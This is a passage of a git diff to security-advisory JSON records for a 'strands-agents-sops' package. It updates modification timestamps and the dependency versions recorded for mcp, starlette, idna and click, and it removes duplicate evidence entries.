"pkg:pypi/mcp@2.0.0", - "resource": "mcp" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.0.0", - "key": "pkg:pypi/mcp@2.0.0", + "subject_version": "2.2.0", + "key": "pkg:pypi/mcp@2.2.0", "resource": "mcp" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2025-53366.json b/advisories/BREW-strands-agents-sops-CVE-2025-53366.json index 1038074043c..ad6e08e804c 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2025-53366.json +++ b/advisories/BREW-strands-agents-sops-CVE-2025-53366.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2025-53366", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-3qhf-m339-9g5v", "CVE-2025-53366", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.9.4", "resource": "mcp", - "resource_purl": "pkg:pypi/mcp@2.0.0" + "resource_purl": "pkg:pypi/mcp@2.2.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mcp", - "subject_version": "2.0.0", - "key": "pkg:pypi/mcp@2.0.0", - "resource": "mcp" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.0.0", - "key": "pkg:pypi/mcp@2.0.0", + "subject_version": "2.2.0", + "key": "pkg:pypi/mcp@2.2.0", "resource": "mcp" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2025-54121.json b/advisories/BREW-strands-agents-sops-CVE-2025-54121.json index 0ac465a2b75..7401a880b2a 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2025-54121.json +++ b/advisories/BREW-strands-agents-sops-CVE-2025-54121.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2025-54121", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-2c2j-9gv5-cj73", "CVE-2025-54121", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.47.2", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2025-62727.json b/advisories/BREW-strands-agents-sops-CVE-2025-62727.json index a8df32360f5..8d23567785c 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2025-62727.json +++ b/advisories/BREW-strands-agents-sops-CVE-2025-62727.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2025-62727", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-7f5h-v6xp-fcq8", "CVE-2025-62727", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.49.1", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2025-66416.json b/advisories/BREW-strands-agents-sops-CVE-2025-66416.json index 646f5c8f8ce..a1fbe70cc28 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2025-66416.json +++ b/advisories/BREW-strands-agents-sops-CVE-2025-66416.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2025-66416", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-9h52-p55h-vw2f", "CVE-2025-66416", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.23.0", "resource": "mcp", - "resource_purl": "pkg:pypi/mcp@2.0.0" + "resource_purl": "pkg:pypi/mcp@2.2.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mcp", - "subject_version": "2.0.0", - "key": "pkg:pypi/mcp@2.0.0", - "resource": "mcp" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.0.0", - "key": "pkg:pypi/mcp@2.0.0", + "subject_version": "2.2.0", + "key": "pkg:pypi/mcp@2.2.0", "resource": "mcp" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-24486.json b/advisories/BREW-strands-agents-sops-CVE-2026-24486.json index f88ba709495..2273b36ef20 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-24486.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-24486.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-24486", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-wp53-j4wj-2cfg", "CVE-2026-24486", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-32597.json b/advisories/BREW-strands-agents-sops-CVE-2026-32597.json index 9cee5836363..3023c429913 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-32597.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-32597.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-32597", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-752w-5fwx-jx9f", "CVE-2026-32597", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-40347.json b/advisories/BREW-strands-agents-sops-CVE-2026-40347.json index e1eeb922330..314135fcc4c 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-40347.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-40347.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-40347", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-mj87-hwqh-73pj", "CVE-2026-40347", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-42561.json b/advisories/BREW-strands-agents-sops-CVE-2026-42561.json index 92cf3dabdb9..174b72239e5 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-42561.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-42561.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-42561", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-pp6c-gr5w-3c5g", "CVE-2026-42561", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-45409.json b/advisories/BREW-strands-agents-sops-CVE-2026-45409.json index b125af3b97f..4269c5a49f1 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-45409.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-45409", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-48522.json b/advisories/BREW-strands-agents-sops-CVE-2026-48522.json index b6339706099..a69a1d0f8ed 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-48522.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-48522.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-48522", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-993g-76c3-p5m4", "CVE-2026-48522", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-48523.json b/advisories/BREW-strands-agents-sops-CVE-2026-48523.json index e74a2e54a32..47bbb7b86df 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-48523.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-48523.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-48523", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-jq35-7prp-9v3f", "CVE-2026-48523", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-48524.json b/advisories/BREW-strands-agents-sops-CVE-2026-48524.json index 8300a3d679a..bd815a8b448 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-48524.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-48524.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-48524", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-fhv5-28vv-h8m8", "CVE-2026-48524", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-48525.json b/advisories/BREW-strands-agents-sops-CVE-2026-48525.json index bef0d14991f..f4a0539310a 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-48525.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-48525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-48525", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-w7vc-732c-9m39", "CVE-2026-48525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-48526.json b/advisories/BREW-strands-agents-sops-CVE-2026-48526.json index 1109c38fee8..65a03f6580e 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-48526.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-48526.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-48526", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-xgmm-8j9v-c9wx", "CVE-2026-48526", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-48710.json b/advisories/BREW-strands-agents-sops-CVE-2026-48710.json index 81fa2c7fde9..74953bca75f 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-48710.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-48710.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-48710", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-29T09:50:10Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-86qp-5c8j-p5mr", "CVE-2026-48710", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.0.1", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -47,16 +47,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-48817.json b/advisories/BREW-strands-agents-sops-CVE-2026-48817.json index 04a62ce43b3..4294f98af92 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-48817.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-48817.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-48817", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-x746-7m8f-x49c", "CVE-2026-48817", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.1.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-48818.json b/advisories/BREW-strands-agents-sops-CVE-2026-48818.json index ab2f1800439..ad3a958fcac 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-48818.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-48818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-48818", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-wqp7-x3pw-xc5r", "CVE-2026-48818", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.1.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-52869.json b/advisories/BREW-strands-agents-sops-CVE-2026-52869.json index def607e4771..f65ca631ac4 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-52869.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-52869.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-52869", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-jpw9-pfvf-9f58", "CVE-2026-52869", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.27.2", "resource": "mcp", - "resource_purl": "pkg:pypi/mcp@2.0.0" + "resource_purl": "pkg:pypi/mcp@2.2.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mcp", - "subject_version": "2.0.0", - "key": "pkg:pypi/mcp@2.0.0", - "resource": "mcp" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.0.0", - "key": "pkg:pypi/mcp@2.0.0", + "subject_version": "2.2.0", + "key": "pkg:pypi/mcp@2.2.0", "resource": "mcp" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-52870.json b/advisories/BREW-strands-agents-sops-CVE-2026-52870.json index 17ef3c62782..0584d737194 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-52870.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-52870.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-52870", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-hvrp-rf83-w775", "CVE-2026-52870", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.27.2", "resource": "mcp", - "resource_purl": "pkg:pypi/mcp@2.0.0" + "resource_purl": "pkg:pypi/mcp@2.2.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mcp", - "subject_version": "2.0.0", - "key": "pkg:pypi/mcp@2.0.0", - "resource": "mcp" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.0.0", - "key": "pkg:pypi/mcp@2.0.0", + "subject_version": "2.2.0", + "key": "pkg:pypi/mcp@2.2.0", "resource": "mcp" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-53537.json b/advisories/BREW-strands-agents-sops-CVE-2026-53537.json index b4afd761131..9cd995ddfe9 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-53537.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-53537.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-53537", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-vffw-93wf-4j4q", "CVE-2026-53537", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-53538.json b/advisories/BREW-strands-agents-sops-CVE-2026-53538.json index 260903cca36..a3a42e699af 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-53538.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-53538.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-53538", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-6jv3-5f52-599m", "CVE-2026-53538", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-53539.json b/advisories/BREW-strands-agents-sops-CVE-2026-53539.json index ac0c91a875f..8a620c23ffe 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-53539.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-53539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-53539", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-5rvq-cxj2-64vf", "CVE-2026-53539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-53540.json b/advisories/BREW-strands-agents-sops-CVE-2026-53540.json index cf82845b241..991b612cb08 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-53540.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-53540.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-53540", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-v9pg-7xvm-68hf", "CVE-2026-53540", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-54282.json b/advisories/BREW-strands-agents-sops-CVE-2026-54282.json index 40b300a4cf6..e9f10c2b70c 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-54282.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-54282.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-54282", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-jp82-jpqv-5vv3", "CVE-2026-54282", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.3.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-54283.json b/advisories/BREW-strands-agents-sops-CVE-2026-54283.json index 696c4737140..fb535cf0276 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-54283.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-54283.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-54283", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-82w8-qh3p-5jfq", "CVE-2026-54283", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.3.1", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-59950.json b/advisories/BREW-strands-agents-sops-CVE-2026-59950.json index e3fb84e96d4..4934dc008ba 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-59950.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-59950.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-59950", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:05:20Z", "upstream": [ "GHSA-vj7q-gjh5-988w", "CVE-2026-59950", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.28.1", "resource": "mcp", - "resource_purl": "pkg:pypi/mcp@2.0.0" + "resource_purl": "pkg:pypi/mcp@2.2.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mcp", - "subject_version": "2.0.0", - "key": "pkg:pypi/mcp@2.0.0", - "resource": "mcp" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.0.0", - "key": "pkg:pypi/mcp@2.0.0", + "subject_version": "2.2.0", + "key": "pkg:pypi/mcp@2.2.0", "resource": "mcp" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-7246.json b/advisories/BREW-strands-agents-sops-CVE-2026-7246.json index 2b7694d267b..23671ae8a06 100644 --- a/advisories/BREW-strands-agents-sops-CVE-2026-7246.json +++ b/advisories/BREW-strands-agents-sops-CVE-2026-7246.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-strands-agents-sops-CVE-2026-7246", "published": "2026-08-13T17:41:09Z", - "modified": "2026-08-13T17:41:09Z", + "modified": "2026-09-10T21:03:15Z", "upstream": [ "PYSEC-2026-2132", "CVE-2026-7246", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "8.3.3", "resource": "click", - "resource_purl": "pkg:pypi/click@8.4.2" + "resource_purl": "pkg:pypi/click@8.5.0" } } ], @@ -46,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "click", - "subject_version": "8.4.2", - "key": "pkg:pypi/click@8.4.2", + "subject_version": "8.5.0", + "key": "pkg:pypi/click@8.5.0", "resource": "click" } ] diff --git a/advisories/BREW-strands-agents-sops-CVE-2026-84378.json b/advisories/BREW-strands-agents-sops-CVE-2026-84378.json new file mode 100644 index 00000000000..644aaa23dd4 --- /dev/null +++ 